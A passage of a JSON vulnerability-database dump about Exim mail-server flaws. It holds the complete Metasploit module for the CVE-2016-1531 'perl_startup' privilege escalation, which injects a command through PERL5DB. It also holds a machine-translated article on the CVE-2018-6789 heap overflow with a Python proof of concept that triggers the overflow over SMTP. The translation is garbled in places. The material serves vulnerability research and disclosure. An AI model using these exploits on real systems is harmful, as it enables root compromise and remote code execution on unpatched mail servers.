"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-1531", "CVE-2016-1531"], "modified": "2016-04-15T00:00:00", "id": "EDB-ID:39702", "href": "https://www.exploit-db.com/exploits/39702", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n\r\n Rank = ExcellentRanking\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim \"perl_startup\" Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a Perl injection vulnerability in Exim < 4.86.2\r\n given the presence of the \"perl_startup\" configuration parameter.\r\n },\r\n 'Author' => [\r\n 'Dawid Golunski', # Vulnerability discovery\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n %w{CVE 2016-1531},\r\n %w{EDB 39549},\r\n %w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}\r\n ],\r\n 'DisclosureDate' => 'Mar 10 2016',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'SessionTypes' => %w{shell meterpreter},\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'BadChars' => \"\\x22\\x27\", # \" and '\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd cmd_bash',\r\n 'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'\r\n }\r\n },\r\n 'Targets' => [\r\n ['Exim < 4.86.2', {}]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n def check\r\n if exploit('whoami') == 'root'\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit(c = payload.encoded)\r\n # PERL5DB technique from http://perldoc.perl.org/perlrun.html\r\n cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec \"#{c}\"' exim -ps 2>&-})\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/raw/39702", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2018-04-09T16:19:07", "description": "Statement: disclosed herein is a method and script for study and research use, any team or individual may use the disclosure herein related to content engaged in the illegal network attacks, otherwise all the consequences by the user himself to bear with the author of this article has nothing to do. \n2018 2 November, the popular open source mail server Exim exposed a heap overflow vulnerability, CVE-2018-6789, and affected nearly 4. 90. 1 all the previous versions. \nThe vulnerability finders\u2014Taiwan security researcher Meh on the blog is provided the use of the vulnerability for remote code execution of the ideas in the tweets also indicate that the final bypass various mitigation measures to successfully achieve remote code execution: \n\n! [](/Article/UploadPic/2018-4/201849174458151. png? www. myhack58. com) \nCurrently Meh and not disclose the exploit code, Huawei the first place lab security researcher skysider based on Meh idea in the experiment environment the successful implementation of the remote command is executed, the associated vulnerability of the environment and the use of the code please visit: https://github.com/skysider/VulnPOC/tree/master/CVE-2018-6789 \n1\\. Vulnerability causes \nThe vulnerabilities of Genesis is the b64decode function in the non-standard base64-encoded data is decoded when the May overflow the stack of a byte, the comparison of the classic off-by-one vulnerability. \nThere are holes in the b64decode function part of the code is as follows: \nb64decode(const uschar *code, uschar **ptr) \n{ \nint x, y; \nuschar *result = store_get(3*(Ustrlen(code)/4) + 1); \n*ptr = result; \n/* Each cycle of the loop handles a quantum of 4 input bytes. For the last \nquantum this may decode to 1, 2, or 3 output bytes. */ \n...... \n} \nThis piece of code to decode the base64 logic is to put the 4 bytes as a group, the 4 bytes are decoded into 3 bytes, but when the last remaining 3 bytes that the len(code)=4n+3, will decode that into 2 bytes, the decoding after the total length is 3n+2 bytes, while the allocated heap space of size 3n+1, Therefore it will happen a stack overflow. Of course, given the official repair programme is also very simple, the multi-allocation of a few bytes. \n2\\. Environment to build \nMeh blog vulnerability test exim version is directly through the apt installation, but since the debian official has been fixed the warehouse in the exim vulnerability, you can view the package source code of the patch information to confirm: \nroot@skysider:~/poc/exim4-4.86.2# apt-get source exim4 \n...... \ndpkg-source: info: applying 93_CVE-2017-1000368. patch \ndpkg-source: info: applying fix_smtp_banner. patch \ndpkg-source: info: applying CVE-2016-9963. patch \ndpkg-source: info: applying CVE-2018-6789. patch \nWe choose to download an earlier version of the source code to compile the installation: \nsudo apt-get build-dep exim4 \nwget https://github.com/Exim/exim/releases/download/exim-4_89/exim-4.89.tar.xz \nDuring compilation you want to install some dependent libraries, you also need to modify the Makefile, create user, configuration, log file permissions, etc., can refer to the Dockerfile of the installation process. \nexim can be specified at run time configuration file, in order to trigger the vulnerability and command execution, you need to configure the CRAM-MD5 authenticator and is set acl_smtp_mail, etc., the configuration file is as follows: \nacl_smtp_mail=acl_check_mail \nacl_smtp_data=acl_check_data \nbegin acl \nacl_check_mail: \n. ifdef CHECK_MAIL_HELO_ISSUED \ndeny \nmessage = no HELO given before MAIL command \ncondition = ${if def:sender_helo_name {no}{yes}} \n. endif \naccept \nacl_check_data: \naccept \nbegin authenticators \nfixed_cram: \ndriver = cram_md5 \npublic_name = CRAM-MD5 \nserver_secret = ${if eq{$auth1}{ph10}{secret}fail} \nserver_set_id = $auth1 \nIn debug mode start the exim service: \nexim-bd-d-receive-C conf. conf \nYou can also directly use the docker to verify the vulnerability, the above commands for the default boot command of: \ndocker run-it --name exim-p 25:25 skysider/vulndocker:cve-2018-6789 \n3\\. Vulnerability testing \nWe use a simple poc to trigger the vulnerability, poc code is as follows: \n#!/ usr/bin/python \n# -*- coding: utf-8 -*- \nimport smtplib \nfrom base64 import b64encode \nprint \"this poc is tested in exim 4.89 x64 bit with cram-md5 authenticators\" \nip_address = raw_input(\"input ip address: \") \ns = smtplib. SMTP(ip_address) \n#s. set_debuglevel(1) \n# 1. put a huge chunk into unsorted bin \ns. ehlo(\"mmmm\"+\"b\"*0x1500) # 0x2020 \n# 2. send base64 data and trigger the off-by-one \n#raw_input(\"overwrite one byte of next chunk\") \ns. docmd(\"AUTH CRAM-MD5\") \npayload = \"d\"*(0x2008-1) \ntry: \ns. docmd(b64encode(payload)+b64encode('\\xf1\\xf1')[:-1]) \ns. quit() \nexcept smtplib. SMTPServerDisconnected: \nprint \"[!] exim server seems to be vulnerable to CVE-2018-6789.\" \nWhen executing this Code, it will trigger a memory error \n\n! [](/Article/UploadPic/2018-4/201849174458752. png? www. myhack58. com) \nIn this process, the stack of the main changes are as follows: \n\n! [](/Article/UploadPic/2018-4/201849174459960. png? www. myhack58. com) \nWe can go to observe the error before the stack, attach to the child process, the following figure is to send the ehlo message after the heap: \n\n! [](/Article/UploadPic/2018-4/201849174459191. png? www. myhack58. com) \nSend Auth data, we can look after executing the b64decode function after the heap: \n\n! [](/Article/UploadPic/2018-4/201849174459700. png? www. myhack58. com)\n\n**[1] [[2]](<89920_2.htm>) [[3]](<89920_3.htm>) [next](<89920_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-09T00:00:00", "type": "myhack58", "title": "Exim Off-by-One RCE vulnerability of CVE-2018-6789 use analysis(reference EXP)-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6789", "CVE-2016-9963", "CVE-2017-1000368"], "modified": "2018-04-09T00:00:00", "id": "MYHACK58:62201889920", "href": "http://www.myhack58.com/Article/html/3/62/2018/89920.htm", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
openSUSE: Security Advisory for exim (openSUSE-SU-2017:2289-1)
